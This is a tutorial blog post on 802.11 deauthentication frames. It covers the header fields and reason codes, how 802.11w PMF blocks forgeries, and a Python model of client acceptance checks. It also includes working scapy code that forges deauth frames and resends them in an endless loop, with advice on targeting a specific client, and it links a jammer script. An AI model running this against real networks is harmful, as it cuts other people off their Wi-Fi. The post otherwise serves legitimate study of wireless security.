by vault, 05 June 2018
In this tutorial we are going to walk through the body of an 802.11 deauthentication frame. Our goal is to terminate the connection between two stations (typically a client and its access point) that are exchanging data. Note that the deauthentication frame is sometimes confused with the disassociation frame. They are not the same frame (they carry different management subtypes), though they share the same structure and the same fields.
If you have ever used aireplay-ng or mdk3, you may have wondered how they manage to kick a client off its AP. That is exactly what a deauthentication or disassociation frame does. Both are management frames, and in the classic 802.11 design management frames are neither authenticated nor integrity-protected, so the receiver has no way of telling who really originated the frame it received. The exception is 802.11w Protected Management Frames: where PMF is enabled and required, deauthentication and disassociation frames are protected and unprotected forgeries are dropped.
Deauth frames are used to terminate a session between two stations. Because the source cannot be verified, what matters is not who actually transmitted the frame but whom it claims to come from and whom it is addressed to. The effect is not permanent: a station can reconnect after it has been deauthenticated, which is why attack tools keep resending the frame. As soon as the frame reaches its destination, the receiver drops its session with the claimed sender. The important Dot11 MAC header fields for a deauth frame are the frame type and subtype (type 0, management; subtype 12, deauthentication; subtype 10 is disassociation), addr1 (the receiver), addr2 (the transmitter) and addr3 (the BSSID).
Graphical Plot of a deauth frame:
The deauth frame consists of three parts:
Deauth in Scapy
Now we will transmit some deauthentication frames over the air using scapy. First of all we need scapy, so install it:
sudo pip install scapy
sudo pip3 install scapy # Python 3
Then launch the Python interactive shell by running python (or python3):
Now getting on to the point, we have to form a deauthentication packet first. Import the required layers from scapy and form a deauth packet.
>>> from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
>>> from scapy.sendrecv import sendp
Forging the packet would go like...
>>> pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2="FF:FF:FF:FF:FF:FF", addr3="FF:FF:FF:FF:FF:FF") / Dot11Deauth(reason=2)
Note the fields: addr1 is the destination (the broadcast address here, so every station in range processes the frame), addr2 is the source and addr3 is the BSSID. reason=2 is the reason code "previous authentication is no longer valid". A client only honours a deauth whose addr2 and addr3 match its own AP's BSSID, so in practice you set those two to the target BSSID rather than to broadcast.
Now, to send the packet. The interface must be in monitor mode (which is what the wlan0mon name indicates), and the frame is resent in a loop so that a client that reconnects is kicked off again:
>>> while True:
...     sendp(pkt, iface="wlan0mon", verbose=False)
Reason codes:
A deauth packet contains a reason field which explains why the connection is being terminated. Here are some of the most commonly used reason codes, as defined in the 802.11 standard:
| Code | Meaning |
| --- | --- |
| 1 | Unspecified reason |
| 2 | Previous authentication is no longer valid |
| 3 | Deauthenticated because sending STA is leaving (or has left) IBSS or ESS |
| 4 | Disassociated due to inactivity |
| 5 | Disassociated because AP is unable to handle all currently associated STAs |
| 6 | Class 2 frame received from nonauthenticated STA |
| 7 | Class 3 frame received from nonassociated STA |
| 8 | Disassociated because sending STA is leaving (or has left) BSS |
| 9 | STA requesting (re)association is not authenticated with responding STA |
| 10 | Disassociated because the information in the Power Capability element is unacceptable |
So, that's how you can get started with your first aireplay-ng style script. Here is a captured deauthentication packet dissected in scapy:
From the highlighted field it is clear that the packet was sent from c8:3a:35:55:0c:f0 to the broadcast address, which means every station associated with that sender processes it. Compared with this, it is better to address the frame to the target station directly: put the target client's MAC in addr1 and the AP's BSSID in addr2 and addr3. The target then knows the frame was meant specifically for it and, since it appears to come from its own AP, has to accept it.
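The frame layout, the reason codes and the addressing rules above can be checked without touching a wireless card. The following is an added example, not code from this page or from the WiFiJammer.py script: it builds the raw 24-byte MAC header plus the 2-byte reason code with struct, parses it back, and models the acceptance checks a client applies (destination, claimed BSSID, and the 802.11w protected bit). The client MAC 00:11:22:33:44:55 and the PMF behaviour are assumptions for the example; the BSSID is the one from the capture discussed above. The protected=True flag only sets the Protected Frame bit, it does not produce a real CCMP-encrypted 802.11w frame.

```python
import struct

# Constructed sample addresses: the AP BSSID is the one from the capture on this page,
# the client MAC is made up for this example.
AP_BSSID = "c8:3a:35:55:0c:f0"
CLIENT_MAC = "00:11:22:33:44:55"
BROADCAST = "ff:ff:ff:ff:ff:ff"

TYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
FLAG_PROTECTED = 0x40  # "Protected Frame" bit in the Frame Control flags byte

# Reason codes from the 802.11 standard (the subset listed on this page, plus 1).
REASON_CODES = {
    1: "Unspecified reason",
    2: "Previous authentication is no longer valid",
    3: "Deauthenticated because sending STA is leaving (or has left) IBSS or ESS",
    4: "Disassociated due to inactivity",
    5: "Disassociated because AP is unable to handle all currently associated STAs",
    6: "Class 2 frame received from nonauthenticated STA",
    7: "Class 3 frame received from nonassociated STA",
    8: "Disassociated because sending STA is leaving (or has left) BSS",
    9: "STA requesting (re)association is not authenticated with responding STA",
    10: "Disassociated because the information in the Power Capability element is unacceptable",
}

# Frame control (2 bytes), duration, addr1, addr2, addr3, sequence control: 24 bytes, little-endian.
HEADER_FMT = "<BBH6s6s6sH"
HEADER_LEN = struct.calcsize(HEADER_FMT)


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(addr1, addr2, addr3, reason=2, seq=0, subtype=SUBTYPE_DEAUTH, protected=False):
    """Raw MAC header + body of a deauth (or disassoc) frame. The card appends the FCS and
    the RadioTap header is added when sending. protected=True only sets the Protected Frame
    bit so the receiver check below can be exercised; a real 802.11w frame would also carry
    a CCMP header and MIC, which this example does not model."""
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)  # protocol version 0, type in bits 2-3, subtype in bits 4-7
    fc1 = FLAG_PROTECTED if protected else 0
    seq_ctrl = (seq & 0x0FFF) << 4           # 12-bit sequence number, fragment number 0
    header = struct.pack(HEADER_FMT, fc0, fc1, 0,
                         mac_to_bytes(addr1), mac_to_bytes(addr2), mac_to_bytes(addr3), seq_ctrl)
    body = struct.pack("<H", reason)          # the whole deauth body is the 2-byte reason code
    return header + body


def parse_frame(frame):
    """Dissect the MAC header and, for deauth/disassoc, the reason code."""
    fc0, fc1, _duration, a1, a2, a3, seq_ctrl = struct.unpack(HEADER_FMT, frame[:HEADER_LEN])
    info = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "protected": bool(fc1 & FLAG_PROTECTED),
        "addr1": bytes_to_mac(a1),
        "addr2": bytes_to_mac(a2),
        "addr3": bytes_to_mac(a3),
        "seq": seq_ctrl >> 4,
    }
    if info["type"] == TYPE_MGMT and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        reason = struct.unpack("<H", frame[HEADER_LEN:HEADER_LEN + 2])[0]
        info["reason"] = reason
        info["reason_text"] = REASON_CODES.get(reason, "Reserved/unknown")
    return info


def client_would_accept(frame, my_mac, my_bssid, pmf_required=False):
    """Model the checks a client makes before honouring a deauth: addressing first, then
    (only if PMF is required) the protected bit. Nothing here can verify who actually
    transmitted the frame, which is why the forgery works on networks without PMF.
    Returns (accepted, explanation)."""
    p = parse_frame(frame)
    if p["type"] != TYPE_MGMT or p["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        return False, "ignored: not a deauth/disassoc frame"
    if p["addr1"] not in (my_mac, BROADCAST):
        return False, "ignored: not addressed to this station"
    if p["addr2"] != my_bssid or p["addr3"] != my_bssid:
        return False, "ignored: addr2/addr3 do not match our AP's BSSID"
    if pmf_required and not p["protected"]:
        return False, "dropped: PMF required but frame is unprotected"
    return True, f"accepted: reason {p['reason']} ({p['reason_text']})"


def to_scapy_packet(frame):
    """Wrap the raw frame for sendp(). scapy is imported only here, so everything above
    runs without it; Dot11(bytes) dissects the header and the Dot11Deauth body."""
    from scapy.layers.dot11 import Dot11, RadioTap
    return RadioTap() / Dot11(frame)
```

Running client_would_accept on the page's first packet (all three addresses set to broadcast) shows why it is a poor forgery: a client ignores it because addr2/addr3 are not its AP's BSSID. The same function returns accepted for a frame with the BSSID in addr2/addr3 and either the client MAC or broadcast in addr1, and rejects an unprotected frame once pmf_required is set, which is the 802.11w behaviour that stops this attack.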
So, we saw the structure of the 802.11 deauthentication packet, and now you should be able to forge your own packet and build something like aireplay or mdk3. Both of these are very powerful tools. I've coded a small script for you to test and to read a little deeper yourself. Here's the link on GitHub: maximMole/WiFiJammer.py. The script does a pretty nice job of explaining and collecting nearby wireless networks and forging deauth packets.